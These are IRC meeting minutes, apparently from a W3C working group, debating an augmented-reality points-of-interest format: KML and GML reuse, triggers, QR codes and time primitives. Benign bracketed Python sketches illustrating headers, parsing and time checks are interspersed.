Ronald: we have name primitive in our browser
... style sheet is not directly part of POI Spec
... you can say that POI Spec has a couple of fields but up to the specific browser to show content of a particular type
Thomas: but does the creator of content want to specify how it is visualized?
Ronald: yes, but not in the POI spec
... the question is if it is part of POI. Or if you have a link to the visualization within the POI
Thomas: should POI include a class reference
Martin: KML does something like that
Essentially what you have is an XML representation of a POI
Martin: do we define a new POI standard. KML defines almost everything we have talked about
... our proposal is to eliminate all of the stuff we do not need in AR
... we pull the KML tags we need and we add AR tags we need
Alex: let's say that the way you describe coordinates, if you disagree with that then you would be leaving the standard
Thomas: simple differences like Lat vs. Latitude
Alex: funny to hear you say that. Dan was showing how we could put RDFa into a web page. Lots of angle brackets. Seems a little verbose
... point of view, perspective changes the definition of "verbose"
probably not worth it for us to invent another way to represent
Alex: at some point we are going to need to peruse other standards and come up with ways to improve them
WGS84, etc
Alex: we need to get down to brass tacks and say who's description we are adopting and what we think it is going to look at
<matt> trackbot, close action-40
<trackbot> ACTION-40 Add links to existing standards closed
Alex: wouldn't necessarily throw out KML if verbose, if millions of people are using it
Thomas: you establish key value pairs and maybe in a few year's time, the changes may come
Matt: Efficient XML Interchange
<danbri> re XML compression, see Efficient XML Interchange Evaluation
<matt> Efficient XML Interchange WG and specs
<JonathanJ> matt, I think we need cooperate with DAP -
Alex: back to KML, we were talking about representation.... I'm not... not to say it's not the right way to approach it but in our KARML version, we take the description tag
and it is HTML. You can have styles. Put some text in and the browser would render it as a default, but you can add HTML for presentation. You could imagine extending it, adding some SVG instead
Alex: so in that case, now the data is inline with the POI
... the issue is that in some circumstances we want a link to presentation data. so effectively, we get the POI data, it has a link to a Web page, and that's the data we want to present in AR
... yesterday we were looking at the entire web page. bottom line is the minimal set that we want to allow people to inline
Dan: there are part of the HTML ....
you can ask it to bring back a really simple version
Dan: can't remember the header names. At the HTTP level there's a whole set of ...
<matt> alex: How common is content negotiation?
matt: very common, gzip
<matt> matt: Depends on the content types. For instance, most browsers support saying "I accept HTML, and gzipped HTML" -- this is widely deployed.
content negotiation, if we define a format with its own MIME type, one of its characteristics could be that it's compressed
Dan: wikipedia might implement it
<danbri> see
Ronald: web servers also try to figure out what type to send
Alex: but that's not reducing what gets sent, it is an efficiency
Thomas: yes it is
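[The content negotiation Matt describes is carried entirely in HTTP request headers, so its shape can be shown without sending anything. A sketch with the standard library; the URL and the `application/vnd.example.poi+xml` media type are placeholders, not registered types:]

```python
import urllib.request

# Ask the server for a preferred representation of the same resource:
# a hypothetical POI media type first, plain XML as a fallback, and
# gzip-compressed transfer if the server supports it.
req = urllib.request.Request(
    "https://example.org/pois?lat=48.8584&lon=2.2945",
    headers={
        "Accept": "application/vnd.example.poi+xml;q=1.0, application/xml;q=0.5",
        "Accept-Encoding": "gzip",
    },
)
# urllib.request.urlopen(req) would perform the negotiated fetch;
# the server picks the best match and reports it in Content-Type.
```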
Martin: one question return to. What metadata
... do we really need a separate POI Standard separate from what already exists? can't we just pull out what we need from KML?
Martin: what tags would we really need?
Alex: we agree with you in general
Matt: we would take a profile of GML and augment with our specific vocabulary
Thomas: we need metadata. If there's an existing standard we should use it
<danbri> (re existing standards, also )
Alex: we only chose KML because it was the broadest adopted markup
Not because we said it was the most/best
Alex: so yes, if you say GML, I agree
... I imagine in the future what we are adding to the dialog is quite small
matt: Yes, it could be a profile of GML.
Martin and Alex are in agreement
<Zakim> danbri, you wanted to assert that extensions shouldn't be an afterthought
Dan: yeah there's all these existing standards
... we've already begun picking up common elements
... story how they are the same is useful. Strongest we can do is extensibility
... figuring out the specific use cases, to specify how different datasets are represented
... connecting hop between what other's do and what AR does/needs is what we can do
Thomas: ...
... it needs to be automatically coming up when the conditions are right
Dan: value adding services need to be able to bring out their data and the people to publish POI data to provide connections between their data and other data without W3C coming up with new vocabulary
Thomas doesn't need to define a movie database format
Dan: example of semantic markup,
<matt> scribe: Matt
ahill: When you say linked data is the way to go, can you describe it? I'm walking down the street looking for particular data, and you're talking about returning links?
Thomas: machine readable links.
ahill: My browser could follow these links and add information from these databases. We don't need to reinvent how to do that by any means.
... What do we need to do to facilitate this?
... Some people might argue that we would need a registry to facilitate these things.
Thomas: I don't think so.
danbri: Maybe at a high level to bring them all together, but the Web is its own registry.
<JonathanJ> see Linked Data -
danbri: I'm walking along and my phone is relating my location to some service. I get a notification that there is a movie playing nearby with actors you like in it.
ahill: My project is relaying this to proxies who then go find this information out, rather than from the device directly.
... What is the difference between agent based semweb stuff and AR?
thomas: I don't think there is one.
ahill: Good, rather than reinvent the wheel we can piggy-back on other efforts.
cperey: I want to throw a monkey wrench in this: you haven't paid for this information. There should be a token to authorize that agent. It's not all just for free.
-> scratch pad
cperey: Then there are ethics, laws. Is this person looking for illegal stuff?
... I just looked at a building and it had one picture, but now it has another, who has the rights for changing that?
Thomas: I don't think that's up for us to implement it.
cperey: Don't you want it in a standardized fashion?
Thomas: There are already standards for these things, SSL, certificates, etc.
cperey: Then we need to write that there are other standards that we could use.
ahill: I don't see the AR uniqueness here. So we don't have to worry about it then.
Ronald: There are security standards.
ahill: People are solving those problems already.
cperey: People aren't solving the problem of predatory real-estate.
Thomas: There's not going to be a one-to-one relationship, the user chooses to accept whatever data publisher they wish.
... If I use a mail service, I'm going to have their ads, that's known. Whatever source we use is going to be responsible for the adverts, etc.
ahill: Another thing we're doing in Argon is offloading to the proxy server under the acknowledgement that search becomes a bigger issue when you walk over to a place and it has 1000 POIs, that's a mess. Your trust network, who your friends or whatever, is really going to affect it.
... We have to acknowledge that at one location there will be a large number of things people have vied to get there.
<Zakim> danbri, you wanted to say 3 things before brain fills up: i) thinking about incentives is good; in my simple scenario, Tuschinski have incentive to get customers ii) those are real
danbri: You're right to think about incentives. In the movie case, they want customers. If we do something as simple as Facebook, they'll get customers.
... The social issues exist. We'll have to look at them.
... And last, oauth is a big piece of this. They want their app to work and be deployable to lots of devices. OAuth seems to be the solution of choice at the moment for that.
Thomas: I think there is a lot of power to come from it. I don't think it's up to us to decide on that.
... The spec shouldn't require a third-party auth.
Ronald: Responding to Christine's suggestion to standardize the too much content problem: I'm not sure that's really feasible. Are search engine results standardized in how they order things?
... No. That area of discovery of information, I'm not sure it's standardizable.
... It's a real problem for AR, but not necessarily one that gets solved by standardization.
Thomas: It's a big issue and so much room for innovation that I think that is where clients will differentiate.
cperey: How do you formulate the query could be standardized, but not how the response is formulated.
... When I heard query POI I was thinking: "Oh, that's talking about a directory of POIs", which isn't the same thing as querying.
... "These are my circumstances, here's a query for that" vs a directory of layers/channels.
<danbri> (ahill, if someone queries for Amsterdam Red Light District, their AR service(s) should route them to )
<danbri> (but that's a marketplace thing)
Ronald: In the end from our findings, it was quite difficult to get to something that the user really valued.
ahill: With them being the authority.
... No one on the web has defined how to index content in a standardized way.
cperey: There's SEO. In libraries we used the Dewey decimal system and found that to be useful.
bertine: I think the difference with the library example is that books are static.
Thomas: It could start off fantastic and then get swamped with ads.
... The order shouldn't be defined, but the request could be, is that right?
Martin: Web pages care about being ordered, but that's all search engine based.
Ronald: There is part of the HTML specification with keyword metadata.
... That gives content providers a way to find the right information.
ahill: Sounds like when possible we could leverage such things.
Thomas: metadata on the Web isn't useful anymore, hard to trust.
... search engines basically ignore metadata these days.
ahill: That's a shifting tide thing though. Might have been useful years ago though.
<danbri> google do use
ahill: So how do we standardize around it?
Thomas: There will likely be AR search engines that look into the AR data and figure out if it's being abused.
<danbri> (you need another signal for trust and quality, eg. google rank, or facebook LIKE, ... then metadata can be exploited)
cperey: Is this matching our agenda?
matt: Is it what the group wants to talk about?
ahill: I think we should talk about these things now.
... I think the tone is that AR is going to be visually based. I think people see that as something very different than the kind of AR we have today.
... I think the points where these things come together is maybe location and description.
... Take the visual sensor example. I'm agnostic about the sensor.
cperey: That whole thing is heavily what the interface that the sensor web folks worked on.
Thomas: That's why I like to call them triggers.
... I'd argue that the POI has to contain the trigger.
matt: I don't understand why trigger has to be a unique part of the structure?
Ronald: I think we said that the trigger is part of the location primitive, maybe not using that word.
<JonathanJ> I'd like to suggest to make another document, something like "Requirements and Use Case for Linked POIs" by danbri
ahill: I could do a search around me and get 100 POIs around me, one of them is this cup. Some people want to call this a trigger, some people like me want to just say "I have the means to know I am in front of this cup".
Thomas: The difference I see is the metadata what you use to search with, while the trigger is an automatic thing.
... For instance the only ones that are in the field of view are triggered.
danbri: It's not up to the objects to determine that.
<cperey> trigger position paper
ahill: Looking at a web page there's a ton of links. You scroll down and click on any of these things with the mouse. The triggers thing seems to be a way to simplify that, but it's more complicated than that, I could have preferences, etc.
Thomas: I'm thinking it's just more of a passive thing. Something that appears merely by association. A browser may or may not display them. I think there's a clear differentiation between active and passive things.
<cperey> trigger by Thomas
martinL: I think location then is a trigger as well.
matt: Why isn't any data in the POI a trigger?
Ronald: It sounds like search criteria.
Thomas: While you could search to have something appear automatically, it's not automatic. I search and don't get all of those results popping out all at one time.
<JonathanJ> POIs could be crawlable by search engines?
Thomas: With AR there's a lot more automatic than the Web. We can't just have users activating everything manually.
<cperey> in the public mailing list
Thomas: I think it's the association of where the content creator believes the data should be put, whether it's image/location/sound based. That's slightly different than what the user wants to see at any given time.
ahill: Imagine there's a landscape with one item. The author specifies where it is, what it looks like,etc. That's AR, I don't need the word trigger yet to filter that.
... I need an argument for the word trigger now.
Thomas: I think you need a way to represent the association.
... A way to associate the data you want and an intended location.
martinL: Alex said filter, I like that, that's essentially what it is.
cperey: no!
ahill: We're talking about filter at one place, and then this trigger that describes the POI that is there.
bertine: It's trigger like a landmine, not a trigger like a gun.
Thomas: We can call it something else if trigger is confusing.
danbri: I found it confusing on the mailing list.
ahill: It's a linkage between place and content.
Thomas: I'd say it's part of the linkage.
... There's two parts: what causes it and what goes to it.
... The trigger is what causes you to go to it.
danbri: So is it up to the client to recognize the class of thing?
Thomas: Yes.
ahill: Is this linkage a POI that the spec is to connect data (SVG, HTML, COLLADA models) to a context of the user. That is our charge.
... Then when you talk about seeing a pen and using a trigger, it makes it confusing.
... A lot of people think "I see this and something is going to happen" -- that's a somewhat different subject.
<danbri> 'trigger' for me has a strong imperative reading, ... that the 'triggering' is inevitable
Thomas: The POI is a link between real and virtual.
... I was using trigger or whatever the word is to indicate the category of the sensor that you're correlating to.
ahill: So, there is a unique item, if I got a description of how to recognize it visually, I could dereference that eventually to the exact location on this table and then it's just like a movie theater, or whatever.
... So it's the same, but a different matter of how we get there.
... Then there's the example of "every pen that looks like this" -- which is a reasonable use case, but to me it's more of a pattern than a trigger to me.
<JonathanJ> POI trigger is like this ? -
ahill: Now, say every building from a company sets aside an area for AR, and that's a pattern. Buses could have a sign on the side --
Thomas: How do you find it if the data isn't there in the POI?
ahill: I know I'm in a store, I look at my coordinates, dereference and I'm done.
Thomas: But that store is static. This is ludicrous, then the bus must relay its coordinates to a server then the client has to fetch it.
... I have nothing against publishing moving coordinates.
... I also think that POIs should be able to specify relative coordinates. I just don't think you can limit it to just the coordinate space.
ahill: This just isn't unique to the domain of visual recognition. I think we will use visual recognition, I'm just saying that visual triggering can happen the same way by other means
... I'm more inclined to push it towards a special case in some sense.
Thomas: To me we need both. The most basic visual recognition is QR codes. That's literally just an image that is then decoded to a URL.
ahill: But that's not a trigger, that's just a linkage.
Thomas: We're associating an image with data, that's just as useful as associating coordinates, whether static or moving.
... The POI needs the capacity for both.
ahill: We need both, but they're not different enough in my mind that they can't be handled.
Thomas: I'm just saying a field in the POI that has coordinates or an image.
ahill: This is what Ronald was alluding to, that a location could have a visual description of pen.
Ronald: And it can be a combination of geo and visual too.
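[Ronald's point — that the anchor can be geodetic, visual, or both — suggests a location primitive with optional fields. A hypothetical sketch only; none of these field names come from any draft spec, and the descriptor bytes and URLs are made up:]

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Location:
    """One POI 'location primitive': any combination of anchors may be set."""
    lat: Optional[float] = None               # geodetic anchor (WGS84)
    lon: Optional[float] = None
    image_descriptor: Optional[bytes] = None  # extracted visual features, not a raw photo

    def anchors(self):
        """Report which kinds of anchor this location carries."""
        kinds = []
        if self.lat is not None and self.lon is not None:
            kinds.append("geo")
        if self.image_descriptor is not None:
            kinds.append("visual")
        return kinds

@dataclass
class POI:
    name: str
    location: Location
    content_url: str  # the virtual content this POI links to

# Visual-only anchor: the pen recognized anywhere it appears.
pen = POI("demo pen",
          Location(image_descriptor=b"\x01\x02\x03"),
          "https://example.org/content/pen")
# Combined anchor: a fixed building matched by both geo and appearance.
theatre = POI("movie theatre",
              Location(lat=52.37, lon=4.89, image_descriptor=b"\x0a\x0b"),
              "https://example.org/content/theatre")
```

[Note the descriptor is stored as extracted features rather than an image, matching cperey's point that clients match features, not whole photographs.]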
cperey: How it's stored is part of the POI, but not what is in there.
Ronald: Sure, the algorithms will change, etc.
cperey: The device which detects those conditions on behalf of a user, whether mobile or stationary, is using sensors.
ahill: Something like identifying a particular pen could have a number of criteria, so how do you author it. My sensor is going to be picking up that pen all over, but it's not necessarily going to be triggered.
Thomas: The system would have the image criteria already in its memory.
cperey: You're never looking at the real object, you're just encoding those unique features that identify that class of object. Only those features, so you have an extremely fine sample, you're not walking around sending entire photographs of the pen around to be detected.
Ronald: Most of the time you're sending an image from the mobile to a server.
Thomas: There can be client side recognition.
cperey: But the point is the server side would probably just maintain the extracted features for recognition.
ahill: if I want to recognize this computer, I take multiple images that then get distilled down to something recognizable.
<Carsten> Morning, just wanted to have a quick look at what you guys are doing
martinL: I don't think there's a chance of standardization there, as different conditions call for different algorithms.
<danbri> (lunch-7.5 mins and counting....)
<Zakim> danbri, you wanted to discuss pre-lunch recap. Any actions arising?
danbri: Where are we? We've been chatting, but what action items are coming out of this?
cperey: We've been here before, and we've had people with agendas from geo-physical data that they want to solve.
ahill: And they didn't want this in scope.
matt: That's not what I saw at the last f2f.
cperey: In the next few minutes, the composition of the people in the group has shifted a bit. And it can shift back.
ahill: This is the part of the meeting where we are addressing AR stuff. We are talking about what are the implications? How does the POI stuff relate to AR?
cperey: This is entirely in scope as the subject of long/lat.
... And the traditional problems of those who own large POI databases?
ahill: Our existing spec solves that. It allows the POI database folks to add WGS 84 coord and a name/description/ec.
... Our existing spec also allows for a pen POI with a visual description and an unknown location.
<danbri> (this is a good time to have people make commitments to do things, and to record those in the issue tracker. I'd be happy to take an action to summarise what I could find out about encoding of URIs in QR Codes, for example)
ahill: In my mind I've got a search that includes "pens that belong to Layar" -- I have those POIs, but I may not be displaying them. To me that's not any different than a POI that's on a building over there that's occluded by another building.
... I don't see it as any different than things popping in there.
Thomas: 99% of the time they'll be preloaded, there is a lot of precaching and displaying later.
ahill: Your interests, your context at the moment, those things all establish the context that determines which POIs are in my browser currently.
danbri: If this room has a POI, there's a URI to it.
Thomas: QR code could be the link.
<scribe> ACTION: danbri to summarize URIs in QR codes to POIWG group [recorded in]
<trackbot> Created ACTION-41 - Summarize URIs in QR codes to POIWG group [on Dan Brickley - due 2011-04-06].
ahill: In my mind our spec at the moment could work for a QR code with linkage to some data.
... I could imagine a QR code being the equivalent of a pen being recognized.
Thomas: There's also the case where the QR code could contain the POI itself, QR codes don't have to be links.
ahill: Practically what is happening? I see a QR code, it's got a URL, I get back a POI. It needs to be linked to something physical, maybe it's a marker to track, or the QR code itself, or four inches from the phone. That's the POI, the QR code is a specific means to encode the URL and there's a separation there.
Thomas: I am seeing a scenario where the QR code decodes to a link which has a POI which then may link to the 3D model.
... But the QR code could be just the POI itself and go directly to the 3D model.
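The two cases Thomas distinguishes can be sketched in a few lines: a QR payload may be a URL that dereferences to a POI document, or it may carry POI data inline. This is an illustration only; the payload formats and the function name are invented, and real QR decoding would of course need an imaging library.

```python
# Sketch of the two QR cases discussed above: a payload that is a link to
# a POI, vs. a payload that is the POI data itself. Formats are invented.
def interpret_qr_payload(payload):
    if payload.startswith(("http://", "https://")):
        return ("link", payload)   # dereference this URL to fetch the POI
    return ("inline", payload)     # treat the payload itself as POI data

print(interpret_qr_payload("http://example.org/poi/42")[0])        # 'link'
print(interpret_qr_payload("POI;name=Pen;lat=52.37;lon=4.89")[0])  # 'inline'
```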
<JonathanJ> QR codes can encode many other kinds of information.
ahill: I see that you want to be pragmatic about the links followed etc, but I'm not sure that's what we need to accommodate in our charge.
Thomas: Perhaps not specifically, but it would be nice.
... We're talking a minimal spec and lots of optionals. Maybe the small thing could be in a QR code.
ahill: In our lab we worked with markers forever, and now they're totally out. We recognize full-on images, which don't have any data encoded in them. I could imagine that some day if we did push for QR codes people would laugh at us in the future.
Thomas: I see advantages to not having the data require a separate lookup.
ahill: I think no one here wants to create a byzantine set of links.
... We've had a lot of discussion but no consensus.
<JonathanJ> we need raise issues
ahill: I think we can resolve that our POI standard that we've put forward accommodates many different scenarios.
... Whether it handles triggers, image recognition, etc. I've resolved in my mind that we haven't excluded any of those things. We haven't excluded any representations too, like COLLADA models, or HTML.
... I think that's valuable, as someone always pipes up on something like this and then we have the discussion again. I don't think we should have to do this conversation again.
<danbri> do we agree? "..."
<JonathanJ> +1
<Ronald> +1
PROPOSED.
<Luca> +1
<cperey> +1
<JonathanJ> s/%1D//
Thomas: future issue: are the different criteria and-ed or or-ed?
<danbri> ... not hearing any objections; are we resolved?
ahill: True. I think people handle lots of this sort of thing in code. I think if people want conditions... they write code.
Thomas: It's a fair point that we don't want to go into the logic too much.
... If you make a web page you don't have to code the functionality of a link. Metaphorically we're working on the equivalent of that, right?
ahill: I won't disagree with that. We're trying to provide some structure that keeps people from writing code to present data.
cperey: Is this called a "data format"?
... Because the OMA folks said specifically say they're considering doing an AR data format.
... I think these two words have universal meaning.
ahill: I'm concerned about making such a statement that is someone will say "POI is not an AR data format". I'd be inclined to say that our POI data format can be used for AR and we have specifically taken note of it. We haven't created a specific AR data format, but we believe it could be applied to that.
<JonathanJ> "AR data format" can include anything
ahill: I'd be hesitant to say it's an "AR data format".
Ronald: There's a reason there's a Core data format.
matt: And part of that is because there are other things that will use the POI format without being AR.
ahill: AR is the linkage format.
<danbri>
<danbri> another use case where the publisher has incentive to be found: Best Buy stores:
<danbri> ACTION: danbri identify relevant specs for rotation/orientation included at point of photo/video creation - what is current practice? [recorded in]
<trackbot> Created ACTION-42 - Identify relevant specs for rotation/orientation included at point of photo/video creation - what is current practice? [on Dan Brickley - due 2011-04-06].
<danbri> eg scenario: I'm stood in middle of Dam Square, looking (west?) towards the palace, running e.g Layar + a flickr layer. Would it be useful to show only photos that are taken facing that same direction, ie. showing the palace and stuff behind it, ... or also the things behind me (Krasnapolsky hotel...)?
<JonathanJ> geolocation WG have been making the orientation spec. -
matt: I see this:
... but it appears to be just about the image orientation.
... iPhone appears to capture in EXIF the data: "Exif.GPSInfo.GPSImgDirectionRef", from:
-> EXIF 2.2 spec includes GPSImgDirectionRef and GPSImgDirection
<danbri> matt, thanks I'll read
<danbri> i made a test image but maybe i have geo turned off
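danbri's Dam Square scenario above (show only photos taken facing the viewer's own heading) can be sketched with plain compass arithmetic. Headings in degrees from true north are what EXIF's GPSImgDirection records; the sample photo list, the 45-degree tolerance, and the function name are all invented for illustration.

```python
# Sketch of direction-based photo filtering per danbri's scenario.
# Headings are degrees clockwise from true north, as in EXIF GPSImgDirection.
def facing_same_way(viewer_heading, photo_heading, tolerance=45.0):
    """True if the photo heading is within tolerance of the viewer heading."""
    diff = abs(viewer_heading - photo_heading) % 360.0
    return min(diff, 360.0 - diff) <= tolerance

photos = [("palace", 270.0), ("hotel", 90.0)]  # invented sample data
viewer = 275.0                                 # viewer facing roughly west
print([name for name, h in photos if facing_same_way(viewer, h)])  # ['palace']
```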
<scribe> Scribe: cperey
<danbri> matt, re ... how do we go about getting a filetree for a testcases repo?
I'll scribe for an hour
When are we going to finish on March 31? At 6 PM.
Matt: we are moving the AR vocabulary to the end, in order to begin working on POI core spec page
... is there anything in the Landscape since last time we reviewed the AR landscape?
Alex: what are we going to do? don't want to go through item by item
<matt> Landscape Document
Alex: we should move on
Matt: get into core drafting, do more of this tomorrow when we have a better understanding of what's in/out of the core.
Alex: Or dedicate a future teleconference to it.
<matt> Agenda again
Matt: questions about the core draft
... we should deal with these up front, some we dealt with yesterday
Ronald: are we trying to split up the work?
... can different people take more focus on specific sections?
Alex: maybe we should take the easier items and get them out of the way
... get the ball rolling with Time and Categorization. It also gives us a process.
Matt: we look at requirements of each primitive
Alex: if we do that as a group, then it's a shorter list
... we have (after Time and Cat) Relationship Primitive-- not something to be done in a smaller group
... then we have location, which is core
Thomas: agree that we need to work together
... Location is low hanging fruit already
Alex: Time establishes the format of what we are going to write
<matt> Core Draft
<danbri> matt can/should I bug sysreq for a poiwg repo? for testcases etc (and specs eventually...)
Alex: we might start with something circumspect
... location can get messy
Ronald: agree that location is pretty complex
Alex: begin with time
<matt> Time primitive
Alex: POI must--> can have a time primitive
... could be time when business is opened and closed
... that is relegated to metadata, not the primary function of POI
... time when this POI was created. This falls in provenance
... time that this thing came into existence.
... it's not obvious that every POI needs a time it came into existence and a time it left
Thomas: if you say that something exists in this range of time, you are saying that we will move the user forward and backward in time
Alex: Google earth (KML) has a time stamp and time Span
<matt> KML Time primitive
Alex: Time Stamp says when and a date
... Time Span has a beginning and an end
... this is used in Google earth, to slide back in time to see content in past
... that's about the extent that we need to define
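Alex's description of KML's Time Span (a begin and an end, driving Google Earth's time slider) can be exercised with the standard library. The namespace and element names follow the real KML 2.2 schema; the sample document itself is invented.

```python
import xml.etree.ElementTree as ET

# Minimal KML fragment with a TimeSpan, per the KML 2.2 schema; the
# placemark content is invented sample data.
kml = """<kml xmlns="http://www.opengis.net/kml/2.2">
  <Placemark>
    <TimeSpan><begin>1997</begin><end>2010-03-31</end></TimeSpan>
  </Placemark>
</kml>"""

ns = {"k": "http://www.opengis.net/kml/2.2"}
span = ET.fromstring(kml).find(".//k:TimeSpan", ns)
print(span.find("k:begin", ns).text, span.find("k:end", ns).text)
```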
Thomas: suggestion that we have one more, ideally, time stamp of the last time the data was updated.
... it is useful for the client to know if they need to download it again or not
Expiration date
Thomas: it is a form of time which is useful
... Modification time
Ronald: might be better to put this in the metadata primitive
<matt> [[what about recurring time sets? (e.g. open hours) or relative times? (a store has open hours relative to the hours of the mall it is in)]]
Alex: this is where the conversation has gotten baroque
... lots of attributes you might want to stamp
... let's say some linked data has a date stamp
Thomas: technical level it is only necessity to have this type of time stamp in the linked data
Alex: how many links are we limiting a POI to?
Thomas: thinking it was One
... if it is more than one, it could be a time stamp per linked data
Alex: we ask for the header, pull it out of the header, say no I don't want the data. Cut short the request, inspect the header
Thomas: COLLADA, X3D don't have those types of headers, may be wrong on that
Alex: is that our scope? to provide a mechanism for linked data to provide an expiration date
Ronald: don't think so. I'm not sure it is valuable. Adds too much complexity. In Layar we have.... to all the links (do they all need a modification time stamp?)
... in our concept they are all linked to the same POI
Thomas: i don't want clients to constantly update/download big files to see if it has been updated recently or not
Matt: HTML has this distinction
... it gets messy
We need a data modification time
Ronald: in the Layar definition, we have a single modification time and it applies to all the data
Alex: concerned that utility might be limited. People might override it. The header did not really capture what we wanted
Thomas: adamant that either it is possible to do this without a time stamp, or, if it can't be done, it has to be there
... if it is not possible to do in the header, it HAS to be in the POI
... this could cause huge problems down the road.
Alex: that's a good argument for time modification time stamp, time span, time of applicability, could have a beginning and end
Matt: when this is being served over HTTP, these headers.... and any other transport mechanism must similarly
<danbri> (ok i've requested a poiwg repo for testcases etc to be added at ... time to read the Mercurial manual...)
Alex: if other POIs query other links, they want to be able to send a time stamp to you to reflect how recently the underlying digital object has been updated
<matt> matt: Basically, I think we should say "if you are transporting POIs over HTTP, you should be setting these X,Y, Z headers with the appropriate values. Other transport mechanisms should likewise provide such information."
matt: If I got a POI and it indicated that something has been changed, then it is my responsibility to go through and check each and to identify which elements have been updated
Alex: save the consumers of this data having to go through the subsegments and check this "manually"
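matt's suggestion above (lean on HTTP caching headers rather than in-POI timestamps) can be sketched without any network traffic. The `Last-Modified` header and its RFC 2822 date format are real HTTP/1.1; the cache-checking function and sample dates are invented.

```python
from email.utils import parsedate_to_datetime

# Sketch: decide whether a cached POI document is stale by comparing
# HTTP Last-Modified header values. Header format is real HTTP/1.1;
# the helper and the sample dates are illustrative only.
def needs_refresh(cached_last_modified, server_last_modified):
    """True if the server copy is newer than the cached copy."""
    cached = parsedate_to_datetime(cached_last_modified)
    server = parsedate_to_datetime(server_last_modified)
    return server > cached

print(needs_refresh("Wed, 30 Mar 2011 09:00:00 GMT",
                    "Thu, 31 Mar 2011 10:00:00 GMT"))  # True
```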
Jacques: this is a basic feature of collaborative AR
Alex: can you please expand or give an example?
Jacques: for example, for guidance application, someone is outside, blind person, and you are looking in VR on a map, and you want to change some audio POI
... so you need to know when the audio POI can be changed
Alex: there's just me
Jacques: the expert is remote
the person in the field
Jacques: you can change the content of a POI
Alex: there's a POI, and we want a way to indicate that the user (remote person changed the POI) that the content has changed
the browser needs to know that the content has changed
Alex: the POI has changed, how does the browser find out about it?
Thomas: this is a pull or push thing. This is web page expiration.
... if you are using a different protocol, it is not for us to decide which protocol is used.
<JonathanJ> I think it seems like POI trigger, or POI pushing
Thomas: any additional downloads are the result, not the ....
Matt: the information about the delivery of the POI goes OUTSIDE of the POI itself
... It's in the envelope
Thomas: if the can is virtual, and the person decides to move it, change the POI location. It would not change the mesh of the can.
... So therefore the client would not be redownloading it, it would download the POI data but not the attached model
Ronald: we are talking about the modification time
Alex: we have the POI. The model has stayed the same; the location has been updated. Does the POI modification time change?
... the POI is in the local agent. Either I need to poll it or it needs to be pushed to me
Which?
Thomas: you don't need to transmit the update time
... just needs to communicate that the .... has been updated
Alex: look at a POI and knowing when it was updated sounds fine, but...
Thomas: The header may be a way to do this.
... the client may need to check to make sure if it has been updated
Alex: isn't that what happens already?
... in the web browser?
Thomas: the server gives recommendations about when to refresh
Martin: there are metatags
Alex: there's a big image, already local (cache) is it not pretty much the case that you have to tell the browser, hey that changed
... the image doesn't have meta, no header, we don't have a mechanism for that
... that's a problem, but it is not clear that it is our problem (yet)
<martinL> +1 for alex
Thomas: if it can't be done in the header, there's not another solution than to have it in the POI recommendation
Alex: reluctant to shoehorn this into the POI spec
Ronald: do we really want to have changeable mesh models
Thomas: most of these things will be fairly static. Meshes will probably be the same
... update time stamp is a simple solution
Alex: the problem is that it is a macro, it is global to the POI, but not specific to what part of it changed, so it doesn't really solve the problem
Thomas: you need one orientation per link
Alex: no, I argue that you don't need that
... if there are multiple links, oriented differently, the base frame of reference from which they are placed is what a single orientation accomplishes
... it sets down a frame of reference. It's not the billboarding
... it is that a single point in space, arbitrarily given, is not adequate
<Luca> etag or any metatag is better to understand if something has changed, instead of a timestamp that can't be unique for all the clients
Alex: a discussion about time for POI, needs to be very specific. What is it about POI that need time?
... what is inherent to POI?
<Luca>
Alex: a time that this POI applies, whatever that means, that time period is really the need for the POI
... In agreement that we should at least have that one
... this is where have to decide what we do now. Do we hunt around for time specs?
Thomas: time span.... what time zone is it specified in?
<matt> XML Schema 2 time section
Thomas: do we need to explicitly tell the client the time frame
<matt> KML time primitive
Alex: KML uses time stamp, they use XML Schema Datatypes Second Edition
<ahill>
Alex: ISO 8601 convention
... this time stamp assumes UTC. If it is not, you can add + or - something
... that's a reasonable place to go
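The ISO 8601 convention Alex describes (UTC assumed, with an explicit + or - offset otherwise) is directly parseable with Python's standard library. The sample timestamps and the `in_span` helper are invented for illustration; note that `fromisoformat` only accepts a bare `Z` suffix from Python 3.11 on, so numeric offsets are used here.

```python
from datetime import datetime, timezone, timedelta

# Hypothetical POI time span in ISO 8601, with explicit UTC offsets.
begin = datetime.fromisoformat("2011-03-30T09:00:00+00:00")  # UTC
end = datetime.fromisoformat("2011-03-31T18:00:00+02:00")    # UTC+2

def in_span(t, begin, end):
    """True if aware datetime t falls inside the [begin, end] span."""
    return begin <= t <= end

now = datetime(2011, 3, 31, 12, 0, tzinfo=timezone.utc)
print(in_span(now, begin, end))  # True: 12:00 UTC precedes 16:00 UTC (18:00+02:00)
```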
... does this spec have a beginning and end
... KML has that, is that a wrapper.
Matt: looking at XML schema spec
... they have lower level primitive
... no recurrence
Thomas: suggestion would be that if year is not included it repeats annually
... what about something that repeats weekly? where do you draw the line
Alex: Other people who have sat around tables, have addressed frequency.
<danbri> matt, could you do a quick followup to my sysreq mail saying "agreed - with staff contact hat on" or similar? in case it bounces due to need for officialrequestness
Thomas: what do you mean the time span to mean in terms of repetition
... are we eliminating the possibility of any recurrence?
Alex: no, I don't have a problem with idea of recurrence, but we don't need a time stamp
Thomas: do not specify a year or a day.
Alex: but I don't know it includes something like Friday
Ronald: if you go to gDay, it is a Gregorian day that recurs
Dan: really wish that we had the use cases
... the use case approach is to start from what a user wants
... can we get 5 POIs in English?
<matt> scribe: matt
danbri: Let's get some use cases
Thomas: 1. A hot dog stand that is occasionally there, but also has open/closed hours.
danbri: What else might you want to know? Health inspections? Kosher?
ahill: Yes, sure, let's throw it into our examples.
Thomas: 2. A historical church that used to exist and is now destroyed.
ahill: 3. A congregation that was at a church for a period of time. The physical building may have its own POI, but the type of church might only be there for a period of time.
danbri: Maybe people are exploring their roots.
cperey: Maybe a timestamp around when a member of the congregation can be trusted or not.
Thomas: This might be linked data from the POI to the person, rather than inline.
ahill: Agree on that.
... Is a person a POI? It's really hard for me to make a good argument that people are not points of interest.
Ronald: If that cup of coffee is a POI and I'm not, I'll be offended!
[[general agreement]]
cperey: The congregant, the congregation and the space in which they all may be are all distinct.
ahill: In the last f2f the major concern about these things were that if we do this we'll have to describes everything and anything.
martinL: 4. Football stadium that is open on Mondays and sometimes Wednesdays.
Thomas: I think at some level of complexity it becomes a manual process.
<danbri> for recurring events, see
martinL: I wouldn't say we want to get too complex, but we then need to have multiple time elements.
Ronald: If we can multiple POI times then we're there.
cperey: What about a church that adds wings?
Thomas: I'd argue that's a different POI.
